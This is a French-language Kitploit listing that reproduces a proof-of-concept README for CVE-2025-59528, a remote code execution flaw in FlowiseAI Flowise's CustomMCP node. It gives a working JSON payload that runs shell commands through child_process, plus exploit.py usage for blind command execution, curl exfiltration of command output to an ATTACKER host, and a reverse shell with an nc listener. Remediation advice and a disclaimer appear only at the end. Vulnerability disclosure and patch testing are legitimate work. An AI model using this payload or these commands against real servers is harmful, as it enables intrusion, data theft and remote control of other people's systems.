Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-59528-POC — CVE-2025-59528 - Exécution de code à distance dans FlowiseAI CustomMCP | Kitploit
Outils/GitHubGitHub/usifaraby/cve-2025-59528-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubusifaraby/cve-2025-59528-poc

CVE-2025-59528-POC

CVE-2025-59528 - Exécution de code à distance dans FlowiseAI CustomMCP

Voir le dépôt
11il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-59528 - Exécution de code à distance dans FlowiseAI CustomMCP

CVSS 10.0 (Critique) | RCE aveugle | FlowiseAI Flowise >= 2.2.7-patch.1 et < 3.0.6

Présentation

Une vulnérabilité critique d'exécution de code à distance dans le nœud CustomMCP de FlowiseAI Flowise. La fonction convertToValidJSONString passe l'entrée fournie par l'utilisateur du paramètre mcpServerConfig directement au constructeur Function() de JavaScript, fonctionnellement équivalent à eval(), permettant l'exécution de code JavaScript arbitraire avec tous les privilèges du runtime Node.js.

  • Découvert par : Kim SooHyun (@im-soohyun)
  • Avis de sécurité : GHSA-3gcm-f6qx-ff7p
  • Corrigé dans : Flowise v3.0.6 (remplacement de Function() par JSON5.parse())
  • Code vulnérable

    Dans packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts, lignes 262–270 :

    root@kitploit:~
    function convertToValidJSONString(inputString) {
        return Function('return ' + inputString)();  // ← Exécution de code arbitraire
    }
    

    Le flux de contamination :

    root@kitploit:~
    HTTP POST → /api/v1/node-load-method/customMCP
      → controller.getSingleNodeAsyncOptions()
        → couche de service
          → CustomMCP.listActions()
            → convertToValidJSONString(mcpServerConfig)  // Function('return ' + userInput)()
    

    Exploitation

    Ceci est une RCE aveugle : la sortie de la commande n'est pas reflétée dans la réponse HTTP. Utilisez des techniques de callback (curl/wget) ou un reverse shell pour confirmer l'exécution.

    Conditions requises

    ConditionDétails
    Version de Flowise>= 2.2.7-patch.1, < 3.0.6
    Accès réseauPoint de terminaison API sur le port 3000 (par défaut)
    AuthentificationOptionnelle pour < 3.0.1, requise pour >= 3.0.1

    Charge utile

    root@kitploit:~
    {
      "loadMethod": "listActions",
      "inputs": {
        "mcpServerConfig": "{x:(function(){const cp=process.mainModule.require('child_process');cp.exec('COMMAND',()=>{});return 1;})()}"
      }
    }
    

    Utilisation

    root@kitploit:~
    pip install requests
    

    Vérifier si la cible est vulnérable (basé sur le temps)

    root@kitploit:~
    python3 exploit.py -t http://target:3000 --mode check --email [email protected] --password pass
    

    Exécution de commande aveugle

    root@kitploit:~
    # Exfiltrer la sortie via callback
    python3 exploit.py -t http://target:3000 --mode exec \
      -c "curl http://ATTACKER:PORT/\$(id | base64)" \
      --email [email protected] --password pass
    

    Shell inversé

    root@kitploit:~
    # Démarrer l'écouteur
    nc -lvnp 4444
    
    # Lancer l'exploit (essaie automatiquement bash, nc, python)
    python3 exploit.py -t http://target:3000 --mode revshell \
      --lhost ADRESSE_ATTAQUANT --lport 4444 \
      --email [email protected] --password pass
    

    Options d'authentification

    root@kitploit:~
    # Authentification JWT (Flowise >= 3.0.1)
    --email [email protected] --password pass
    
    # Authentification de base (Flowise < 3.0.1 avec la variable d'environnement FLOWISE_USERNAME)
    --username admin --password pass
    
    # Chaîne de cookie brute (solution de repli)
    --cookie "token=eyJ...;refreshToken=eyJ...;connect.sid=s%3A..."
    

    Remédiation

    • Mettez à niveau vers Flowise >= 3.0.6
    • Restreignez l'accès à l'API via un pare-feu/VPN
    • Activez l'authentification sur toutes les instances
    • Surveillez les journaux pour les requêtes POST vers /api/v1/node-load-method/customMCP

    Références

    • NVD — CVE-2025-59528
    • GitHub Advisory — GHSA-3gcm-f6qx-ff7p
    • Analyse des menaces SonicWall
    • Commit de correction — Flowise v3.0.6

    Avertissement

    Cet outil est fourni uniquement pour des tests de sécurité autorisés et à des fins éducatives. L'accès non autorisé aux systèmes informatiques est illégal. Obtenez toujours une autorisation appropriée avant de tester.

    Télécharger l’outil